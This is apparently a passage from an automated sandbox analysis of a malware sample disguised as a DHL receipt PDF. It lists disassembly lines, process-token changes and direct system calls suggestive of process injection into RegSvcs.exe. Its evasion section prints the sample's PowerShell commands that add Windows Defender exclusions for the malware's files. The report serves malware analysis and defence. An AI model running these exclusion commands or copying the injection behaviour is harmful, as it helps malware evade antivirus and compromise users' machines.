                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01058243 mov eax, dword ptr fs:[00000030h]10_2_01058243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01058243 mov ecx, dword ptr fs:[00000030h]10_2_01058243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8397 mov eax, dword ptr fs:[00000030h]10_2_00FC8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8397 mov eax, dword ptr fs:[00000030h]10_2_00FC8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8397 mov eax, dword ptr fs:[00000030h]10_2_00FC8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF438F mov eax, dword ptr fs:[00000030h]10_2_00FF438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF438F mov eax, dword ptr fs:[00000030h]10_2_00FF438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE388 mov eax, dword ptr fs:[00000030h]10_2_00FCE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE388 mov eax, dword ptr fs:[00000030h]10_2_00FCE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE388 mov eax, dword ptr fs:[00000030h]10_2_00FCE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E284 mov eax, dword ptr fs:[00000030h]10_2_0100E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E284 mov eax, dword ptr fs:[00000030h]10_2_0100E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01050283 mov eax, dword ptr fs:[00000030h]10_2_01050283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01050283 mov eax, dword ptr fs:[00000030h]10_2_01050283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01050283 mov eax, dword ptr fs:[00000030h]10_2_01050283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov ecx, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCC310 mov ecx, dword ptr fs:[00000030h]10_2_00FCC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF0310 mov ecx, dword ptr fs:[00000030h]10_2_00FF0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01066500 mov eax, dword ptr fs:[00000030h]10_2_01066500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD04E5 mov ecx, dword ptr fs:[00000030h]10_2_00FD04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD64AB mov eax, dword ptr fs:[00000030h]10_2_00FD64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100656A mov eax, dword ptr fs:[00000030h]10_2_0100656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100656A mov eax, dword ptr fs:[00000030h]10_2_0100656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100656A mov eax, dword ptr fs:[00000030h]10_2_0100656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01004588 mov eax, dword ptr fs:[00000030h]10_2_01004588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFA470 mov eax, dword ptr fs:[00000030h]10_2_00FFA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFA470 mov eax, dword ptr fs:[00000030h]10_2_00FFA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFA470 mov eax, dword ptr fs:[00000030h]10_2_00FFA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E59C mov eax, dword ptr fs:[00000030h]10_2_0100E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC645D mov eax, dword ptr fs:[00000030h]10_2_00FC645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010505A7 mov eax, dword ptr fs:[00000030h]10_2_010505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010505A7 mov eax, dword ptr fs:[00000030h]10_2_010505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010505A7 mov eax, dword ptr fs:[00000030h]10_2_010505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF245A mov eax, dword ptr fs:[00000030h]10_2_00FF245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E5CF mov eax, dword ptr fs:[00000030h]10_2_0100E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E5CF mov eax, dword ptr fs:[00000030h]10_2_0100E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A5D0 mov eax, dword ptr fs:[00000030h]10_2_0100A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A5D0 mov eax, dword ptr fs:[00000030h]10_2_0100A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCC427 mov eax, dword ptr fs:[00000030h]10_2_00FCC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE420 mov eax, dword ptr fs:[00000030h]10_2_00FCE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE420 mov eax, dword ptr fs:[00000030h]10_2_00FCE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE420 mov eax, dword ptr fs:[00000030h]10_2_00FCE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C5ED mov eax, dword ptr fs:[00000030h]10_2_0100C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C5ED mov eax, dword ptr fs:[00000030h]10_2_0100C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008402 mov eax, dword ptr fs:[00000030h]10_2_01008402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008402 mov eax, dword ptr fs:[00000030h]10_2_01008402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008402 mov eax, dword ptr fs:[00000030h]10_2_01008402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]10_2_00FFE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD25E0 mov eax, dword ptr fs:[00000030h]10_2_00FD25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056420 mov eax, dword ptr fs:[00000030h]10_2_01056420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD65D0 mov eax, dword ptr fs:[00000030h]10_2_00FD65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A430 mov eax, dword ptr fs:[00000030h]10_2_0100A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E443 mov eax, dword ptr fs:[00000030h]10_2_0100E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF45B1 mov eax, dword ptr fs:[00000030h]10_2_00FF45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF45B1 mov eax, dword ptr fs:[00000030h]10_2_00FF45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105C460 mov ecx, dword ptr fs:[00000030h]10_2_0105C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD2582 mov eax, dword ptr fs:[00000030h]10_2_00FD2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD2582 mov ecx, dword ptr fs:[00000030h]10_2_00FD2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8550 mov eax, dword ptr fs:[00000030h]10_2_00FD8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8550 mov eax, dword ptr fs:[00000030h]10_2_00FD8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010044B0 mov ecx, dword ptr fs:[00000030h]10_2_010044B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105A4B0 mov eax, dword ptr fs:[00000030h]10_2_0105A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFE53E mov eax, dword ptr fs:[00000030h]10_2_00FFE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0535 mov eax, dword ptr fs:[00000030h]10_2_00FE0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C700 mov eax, dword ptr fs:[00000030h]10_2_0100C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01000710 mov eax, dword ptr fs:[00000030h]10_2_01000710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C720 mov eax, dword ptr fs:[00000030h]10_2_0100C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C720 mov eax, dword ptr fs:[00000030h]10_2_0100C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104C730 mov eax, dword ptr fs:[00000030h]10_2_0104C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100273C mov eax, dword ptr fs:[00000030h]10_2_0100273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100273C mov ecx, dword ptr fs:[00000030h]10_2_0100273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100273C mov eax, dword ptr fs:[00000030h]10_2_0100273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100674D mov esi, dword ptr fs:[00000030h]10_2_0100674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100674D mov eax, dword ptr fs:[00000030h]10_2_0100674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100674D mov eax, dword ptr fs:[00000030h]10_2_0100674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01054755 mov eax, dword ptr fs:[00000030h]10_2_01054755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012750 mov eax, dword ptr fs:[00000030h]10_2_01012750
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe"
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtTerminateThread: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe    NtSetInformationThread: Direct from: 0x76EE63F9
